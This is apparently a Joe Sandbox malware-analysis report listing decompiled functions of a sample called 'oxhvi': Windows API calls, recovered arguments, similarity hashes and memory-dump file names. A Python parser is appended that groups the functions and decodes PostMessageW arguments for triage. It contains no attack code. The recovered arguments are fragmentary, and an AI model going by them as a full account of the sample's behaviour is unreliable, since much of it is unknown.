• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: 940065161ae202cdacc484dec545279d76f84a5d5ba6a5511b17ac4e8b4d678f
• Instruction ID: 044b415f8f4a9b6a1c61a2488617bb351d09a4958915690baa2972deecb8d870
• Opcode Fuzzy Hash: 940065161ae202cdacc484dec545279d76f84a5d5ba6a5511b17ac4e8b4d678f
• Instruction Fuzzy Hash: 93418071A0061A9FCB04DFA9C88A9FEBFB5FF98314F144069E906A7252D774AD81CB50
APIs
  • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
  • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
• GetParent.USER32(?), ref: 00573404
• DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0057348E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: LongWindow$ParentProc
• String ID: Hb
• API String ID: 2181805148-1270690246
• Opcode ID: dd0a348e8781229f06b5925cef1f6679c33030baa54c25baf5b71f7834e9ceb6
• Instruction ID: 2e5427d410f479f75456cd3d16f7050bb1ec9b4f77e3615f6805caf9570e97ac
• Opcode Fuzzy Hash: dd0a348e8781229f06b5925cef1f6679c33030baa54c25baf5b71f7834e9ceb6
• Instruction Fuzzy Hash: B6215E74600514AFCF2E9F68DC5CDAA3FA6FF46370F148254F5194B2A1C3319E55E650
APIs
  • Part of subcall function 0053771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00537759
  • Part of subcall function 0053771B: GetStockObject.GDI32(00000011), ref: 0053776D
  • Part of subcall function 0053771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00537777
• GetWindowRect.USER32(00000000,?), ref: 005C40D9
• GetSysColor.USER32(00000012), ref: 005C40F3
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 47630474a0a2415abc6bed5fcf8714aca7ba3b1a437829d9ee28eedef729833e
• Instruction ID: 957bdec688028d1dd1b05ef280cacc406fdb03eb81b20420aed2fc0a860262d6
• Opcode Fuzzy Hash: 47630474a0a2415abc6bed5fcf8714aca7ba3b1a437829d9ee28eedef729833e
• Instruction Fuzzy Hash: A611267261020AAFDB01DFA8CC4AEFA7BB8FB08314F004928F955E7250E674E851DB60
APIs
                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005C6B5B
                                                                                                                                                      • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 005C6B84
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3850602802-1270690246
                                                                                                                                                      • Opcode ID: 03ceed41a8cca5786fcebf3a39ea271b15867c0833532f51148bdb9facc9fe41
                                                                                                                                                      • Instruction ID: 97aeb140d6aa522d3773febaf08609dc691e862465f110db342ba5cd4d4048bd
                                                                                                                                                      • Opcode Fuzzy Hash: 03ceed41a8cca5786fcebf3a39ea271b15867c0833532f51148bdb9facc9fe41
                                                                                                                                                      • Instruction Fuzzy Hash: 98115E71140208BEEB158FA8CC1AFB93BA4FB09728F104219FA16EA1D0D6B1DF50EB50
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005925DC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: d754960a80a7bcb2ce4c6c768df755e8f4e272d9f099b87b219cb6e2783755b9
                                                                                                                                                      • Instruction ID: 1c7590f041ebb5940ec48a310dd01661b5fae017c09e24d5ceef6ab51055f8c2
                                                                                                                                                      • Opcode Fuzzy Hash: d754960a80a7bcb2ce4c6c768df755e8f4e272d9f099b87b219cb6e2783755b9
                                                                                                                                                      • Instruction Fuzzy Hash: 6F01287560011ABBCF04EBA4CC15DFE7F65FF91310F040A19B9629B2D2EA309808D750
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 005924D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: eebb4825791f47b9a5f7d9d8fa7f69256317357b8cf1c0ea59ade571e110e8e5
                                                                                                                                                      • Instruction ID: 9c48e022b90b00b9e20d06da0776582f3174bddad4923e78983de96930683745
                                                                                                                                                      • Opcode Fuzzy Hash: eebb4825791f47b9a5f7d9d8fa7f69256317357b8cf1c0ea59ade571e110e8e5
                                                                                                                                                      • Instruction Fuzzy Hash: 3401A77564010ABBDF18EBA0C855EFF7FA9FF95340F14001A760667282DA609E08D6B1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00592558
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: e268664e98c5c00bdf58eb70a52c4d13c645e83ccdf0a074f06bbf389b3cd0d0
                                                                                                                                                      • Instruction ID: 5a498e5d145a40fb4f530d0582736cc0fcff46b90f2a754eb672e12c12fe1b02
                                                                                                                                                      • Opcode Fuzzy Hash: e268664e98c5c00bdf58eb70a52c4d13c645e83ccdf0a074f06bbf389b3cd0d0
                                                                                                                                                      • Instruction Fuzzy Hash: CC01D67564010ABBDF14EBA4C916FFFBFA8FF51740F140015BA02B7282EA259F099A71
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00592663
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: cbfd9a58eb799836da720e68478ceccf0647433332940e5e992c0def0c5f78d3
                                                                                                                                                      • Instruction ID: a2a4b4da0b9c1bca3b7bf1522cf3cb57337a877894ad1c46e42299c1c56253a6
                                                                                                                                                      • Opcode Fuzzy Hash: cbfd9a58eb799836da720e68478ceccf0647433332940e5e992c0def0c5f78d3
                                                                                                                                                      • Instruction Fuzzy Hash: F3F08171A4021ABADF14E7A4DC56FFFBF78FB51710F040A19B662A72C2DF6059098660
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00604018,0060405C), ref: 005C8B1E
                                                                                                                                                      • CloseHandle.KERNEL32 ref: 005C8B30
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                      • String ID: \@`
                                                                                                                                                      • API String ID: 3712363035-657203355
                                                                                                                                                      • Opcode ID: 0b9fac36a8be36f0046f925915c8037c6347b9cff1082d35b235c114aa3f0252
                                                                                                                                                      • Instruction ID: 57f8be4b3f1b1c8e0a207bd9ec22b222ee993ba313509780d8ee17ebb16e4ff3
                                                                                                                                                      • Opcode Fuzzy Hash: 0b9fac36a8be36f0046f925915c8037c6347b9cff1082d35b235c114aa3f0252
                                                                                                                                                      • Instruction Fuzzy Hash: C4F03AF2580315BEF3302B60AC59FB73E5DEB15795F005425BB09E61A2DE654C4493B8
                                                                                                                                                      APIs
                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2C8B
                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005C2C9E
                                                                                                                                                        • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                      • Opcode ID: aed59866e257827a9e459e6392b4ae11011db26ca610879ab13f5a1bc9d3d910
                                                                                                                                                      • Instruction ID: f93a060e2df67d3ba5bbc93bf026f145b2acf800c1bc6a8e5c55ab9a56062404
                                                                                                                                                      • Opcode Fuzzy Hash: aed59866e257827a9e459e6392b4ae11011db26ca610879ab13f5a1bc9d3d910
                                                                                                                                                      • Instruction Fuzzy Hash: C8D0C9353D5754ABE668B770DC0FFD66E64ABA4B10F000825B349EA1D0C9A4A844D6A4
                                                                                                                                                      APIs
                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2CCB
                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 005C2CD2
                                                                                                                                                        • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                      • Opcode ID: b542ba2635d7f7b91b26d032bd6f17c3e359840e7abf1f20424c043cb2972d7c
                                                                                                                                                      • Instruction ID: 445bdcb06aef97a3b61fc2add683ed1796164c6196155a0a712b635c71e5f43d
                                                                                                                                                      • Opcode Fuzzy Hash: b542ba2635d7f7b91b26d032bd6f17c3e359840e7abf1f20424c043cb2972d7c
                                                                                                                                                      • Instruction Fuzzy Hash: 69D0C9353C57546BF668B770DC0FFD66A64ABA4B10F400825B345EA1D0C9A4A844D6A8
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0056C233
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0056C241
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0056C29C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                      • Opcode ID: d1e12c877c46738716599d0f43948bd0728efa16d7f5688e782eb69db7854a12
                                                                                                                                                      • Instruction ID: 1886826cd526cf4717d1b421987c6cad262d99fdf77bc809c368557906898a34
                                                                                                                                                      • Opcode Fuzzy Hash: d1e12c877c46738716599d0f43948bd0728efa16d7f5688e782eb69db7854a12
                                                                                                                                                      • Instruction Fuzzy Hash: 2E41D635600246AFCF218FE9C864ABA7FB5FF45710F254169ECE9AB2A1DB308D05D760
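The function blocks above are useful for triage only once they are turned into per-function API sequences and grouped by the report's "API String ID", which is what lets an analyst see that the two FindWindowW/PostMessageW functions are near-duplicates while the MultiByteToWideChar function is unrelated. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the block layout shown on this page (the "APIs" list, "Part of subcall function" lines and the "Similarity" identifiers), decodes the PostMessageW arguments (0x0111 is WM_COMMAND; the command ID 0x197, decimal 407, is left numeric rather than named), and groups functions that share an API String ID. The sample text is copied from the three blocks above and trimmed to the lines the parser needs; the class names, field names and the `WINDOW_MESSAGES` table are this example's own.

```python
"""Parse Joe Sandbox IDA-plugin function blocks into structured records."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Only the message constant this excerpt uses; extend as needed.
WINDOW_MESSAGES = {0x0111: "WM_COMMAND"}

# Constructed input: lines copied from the report blocks above, trimmed.
REPORT_EXCERPT = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2C8B
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005C2C9E
  • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: aed59866e257827a9e459e6392b4ae11011db26ca610879ab13f5a1bc9d3d910
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2CCB
• PostMessageW.USER32(00000000), ref: 005C2CD2
  • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: b542ba2635d7f7b91b26d032bd6f17c3e359840e7abf1f20424c043cb2972d7c
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?), ref: 0056C233
• GetLastError.KERNEL32 ref: 0056C241
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0056C29C
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: d1e12c877c46738716599d0f43948bd0728efa16d7f5688e782eb69db7854a12
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # hex strings or "?" exactly as the report prints them
    ref: str                 # address of the call site
    via_subcall: Optional[str] = None  # address of the subcall when the call is indirect


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""


API_RE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.*)")
META_RE = re.compile(r"(API ID|API String ID|Opcode ID): ?(.*)")


def parse_api_line(text: str) -> Optional[ApiCall]:
    """Turn one bullet into an ApiCall; returns None for non-API bullets (Source File, etc.)."""
    via = None
    m = SUBCALL_RE.match(text)
    if m:
        via, text = m.group("func"), m.group("rest")
    m = API_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), via)


def parse_report(text: str) -> list[FunctionBlock]:
    """Each 'APIs' header starts a new function block; other lines are ignored."""
    blocks: list[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("• ").strip()
        meta = META_RE.match(body)
        if meta:
            key, value = meta.groups()
            setattr(current, key.lower().replace(" ", "_"), value.strip())
            continue
        call = parse_api_line(body)
        if call:
            current.calls.append(call)
    return blocks


def api_sequence(block: FunctionBlock) -> list[str]:
    return [c.name for c in block.calls]


def decode_post_message(call: ApiCall) -> dict:
    """Name PostMessageW's arguments. The report prints only what it recovered, so the
    second function (a single 00000000) yields a partial result instead of a guess."""
    if call.name != "PostMessageW":
        raise ValueError("not a PostMessageW call")
    out = {}
    for key, value in zip(("hwnd", "msg", "wParam", "lParam"), call.args):
        if value == "?":
            continue
        n = int(value, 16)
        out[key] = WINDOW_MESSAGES.get(n, hex(n)) if key == "msg" else n
    return out


def group_by_api_string_id(blocks: list[FunctionBlock]) -> dict[str, list[str]]:
    """Map each API String ID to the Opcode IDs of the functions sharing it."""
    groups: dict[str, list[str]] = {}
    for b in blocks:
        groups.setdefault(b.api_string_id, []).append(b.opcode_id)
    return groups


if __name__ == "__main__":
    for b in parse_report(REPORT_EXCERPT):
        print(b.api_string_id, "->", api_sequence(b))
```

Run against the excerpt, the first two blocks collapse into one API String ID (529655941-2988720461) with the sequence FindWindowW, PostMessageW, Sleep, and the PostMessageW in the first of them decodes to WM_COMMAND with wParam 407 sent to the window found by FindWindowW("Shell_TrayWnd"); the third block stays separate under 1717984340-0. A call whose arguments the report could not recover stays partial, which is the honest result when working from a memory dump.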